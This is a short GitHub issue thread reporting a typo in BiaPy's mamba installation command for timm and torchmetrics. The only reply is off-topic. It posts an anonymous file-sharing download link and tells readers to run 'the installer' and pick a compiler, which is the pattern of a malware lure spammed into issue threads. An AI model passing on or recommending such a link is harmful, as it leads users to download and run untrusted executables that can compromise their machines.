### ISSUE TITLE
Typo for Mamba installation timm and torch metrics

### ISSUE THREAD

**Issue by ClementCaporal** [BiaPyX/BiaPy-doc#3]
https://github.com/BiaPyX/BiaPy-doc/blame/bc15123a56a2daf7b643d81550c7dc00c32a25d0/source/get_started/installation.rst#L223

`mamba timm tochmetrics` --> `mamba install timm torchmetrics`

**Comment by Shadi201711** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
